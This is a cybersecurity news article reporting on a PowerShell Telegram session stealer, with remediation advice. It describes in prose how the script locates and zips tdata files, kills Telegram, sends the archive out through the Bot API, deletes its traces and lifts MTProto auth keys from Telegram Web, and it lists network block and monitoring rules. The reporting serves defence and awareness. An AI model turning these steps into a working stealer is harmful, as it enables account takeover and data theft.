Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Mythos Ransomware Returns, Kali Linux 2024.2 Released, WhatsApp Vulnerability
July 5, 2026
Microsoft Patches Windows 11 OOBE Flaw in Cumulative Update
July 5, 2026
PamStealer Mimics Maccy, Silently Harvests Data
July 4, 2026
Home/Threats/Hackers Exploit Telegram Desktop Vulnerability to Steal User Sessions
Threats

Hackers Exploit Telegram Desktop Vulnerability to Steal User Sessions

Key Takeaways Cybersecurity researchers have identified a PowerShell script designed to steal Telegram desktop and web sessions. The script, disguised as a “Windows Telemetry Update,”...

Sarah simpson
Sarah simpson
April 24, 2026 4 Min Read
51 0

Key Takeaways

  • Cybersecurity researchers have identified a PowerShell script designed to steal Telegram desktop and web sessions.
  • The script, disguised as a “Windows Telemetry Update,” exfiltrates user session data and system metadata.
  • The threat leverages the Telegram Bot API for data exfiltration and shares infrastructure with a web-based session capture tool.
  • The threat is considered high-severity, and immediate mitigation steps are recommended for potentially affected users.

Cybersecurity experts have uncovered a specialized PowerShell script actively being used to compromise user sessions on both Telegram Desktop and Telegram Web. This sophisticated threat, masquerading as a routine system update, is capable of extracting sensitive session data, posing a significant risk to users.

Table Of Content

  • Key Takeaways
  • How the Script Steals Your Telegram Session
  • What You Should Do

The malicious script, deceptively named “Windows Telemetry Update,” is engineered to appear as a legitimate Windows maintenance task. Upon execution, it swiftly gathers host metadata, including the victim’s username, computer name, and public IP address, before proceeding to its primary objective of session theft.

The script specifically targets directories associated with Telegram Desktop and Telegram Desktop Beta installations, located under %APPDATA%. It then compresses the located session files into a diag.zip archive, temporarily stored in the user’s TEMP folder, before exfiltrating them.

Analysts at Flare discovered this script, hosted on Pastebin, during their continuous monitoring of illicit online channels and paste sites for malicious content. Their investigation revealed a dedicated Telegram session stealer that not only targets desktop session data but also utilizes the Telegram Bot API for exfiltration. Furthermore, it shares infrastructure with a distinct web-based session capture tool.

Researchers note that while the tool’s technical sophistication is minimal, its artifacts provide valuable insights into the development lifecycle of such malicious tools. The analysis uncovered two distinct collection mechanisms at varying stages of development, hardcoded credentials that exposed the operator’s historical activities, and a clear debugging process from an initial, flawed version to a fully functional one.

The script was discovered in two versions on Pastebin, both uploaded by the same account. The initial version (v1) contained a faulty multipart upload implementation, preventing the “diag.zip” archive from reaching the attacker’s bot. The operator subsequently identified and rectified this issue, releasing a corrected version (v2) that properly implemented the sendDocument endpoint using the Invoke-RestMethod -Form approach with correct multipart/form-data encoding. This transparent debugging process, visible through Pastebin’s public post history, offers a rare glimpse into how session-stealing tools are refined before being deployed in active campaigns.

Neither version of the script incorporates obfuscation, persistence mechanisms, nor an automated delivery or execution method. Based on Flare’s assessment, the script appeared to be in an active validation phase at the time of its discovery rather than being used in widespread attacks. However, the presence of a functional v2 variant and a confirmed web-based session stealer sharing the same bot infrastructure suggests that the capability has passed functional validation and could soon transition to large-scale operations.

How the Script Steals Your Telegram Session

The compromise begins when a user manually executes the PowerShell file. The script immediately initiates two parallel investigative processes: it directly queries the Telegram Bot API to enumerate the bot and retrieves existing bot telemetry from the bot’s message history using the Matka tool.

After collecting essential host metadata, the script scans for both stable and beta installations of Telegram Desktop within the %APPDATA% directory. If at least one tdata path is identified, it’s added to a paths array, and the script proceeds. If no Telegram installation is found, it sends a “No Telegram installation found” beacon to the operator, ensuring notification regardless of the outcome.

To ensure successful data extraction, the script forcibly terminates any active Telegram processes, releasing file locks on the tdata directory before initiating compression. A two-second delay is incorporated to allow for complete process termination, a detail indicating the attacker’s awareness of Telegram Desktop’s file-locking behavior. Once the archive is prepared, the api.telegram.org/bot{token}/sendDocument API endpoint is invoked, sending the “diag.zip” file to the operator’s chat ID, accompanied by victim metadata as a caption. Should this method fail, a WebClient UploadFile fallback mechanism ensures the archive still reaches the operator, albeit without the caption. The script concludes by immediately deleting the diag.zip file from disk to minimize forensic traces.

In parallel, a separate web-based stealer component captures active Telegram Web localStorage session state, specifically targeting dcX_auth_key MTProto authorization keys and account1 session structures. This data is exfiltrated using the same shared Telegram bot channel. Possession of these keys allows an attacker to reconstruct authenticated sessions without requiring the account password or SMS verification after initial setup.

What You Should Do

If you suspect this script has compromised your system, immediate action is crucial:

  • Terminate Active Telegram Sessions: Go to your Telegram application’s Settings, then Privacy and Security, navigate to Active Sessions, and select “Terminate All Other Sessions.”
  • Change Telegram Password: Immediately change your Telegram account password.
  • Enable Two-Factor Authentication (2FA): If not already active, enable two-factor authentication for your Telegram account. This adds an essential layer of security.
  • Review Account Activity: Thoroughly review your Telegram account for any unauthorized activity, unusual messages sent from your account, or unexpected changes to account settings.
  • Assess Data Exposure: Consider that any sensitive information previously shared through Telegram may have been exposed. Take appropriate steps to secure related accounts or notify affected parties.
  • Network-Level Blocking: For organizations, block the domains api.telegram.org and web.telegram.org at the proxy and firewall layers in environments where Telegram is not permitted.
  • Monitor API Calls: In environments where Telegram is allowed, monitor for sendDocument and sendMessage API calls originating from scripting environments like PowerShell, Python, or curl. Such calls are highly unusual in legitimate enterprise settings and warrant immediate investigation.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCybersecurityHackerSecurityThreat

Share Article

Sarah simpson

Sarah simpson

Sarah is a cybersecurity journalist specializing in threat intelligence and malware analysis. With over 8 years of experience covering APT groups, zero-day exploits, and advanced persistent threats, Sarah brings deep technical expertise to breaking cybersecurity news. Previously, she worked as a security researcher at leading threat intelligence firms, where she analyzed malware samples and tracked cybercriminal operations. Sarah holds a Master's degree in Computer Science with a focus on cybersecurity and is a regular contributor to major security conferences.

Previous Post

Dokkaebi Hackers Target Developers with Fake Job Interviews and Malware

Next Post

Fake CAPTCHA Pages Lead to Costly International SMS Fraud

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
India Bans Apps Used to Remotely Disable E-Rickshaws
July 3, 2026
The Future of Encryption: Top Post-Quantum Cryptography Solutions for 2026
July 3, 2026
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us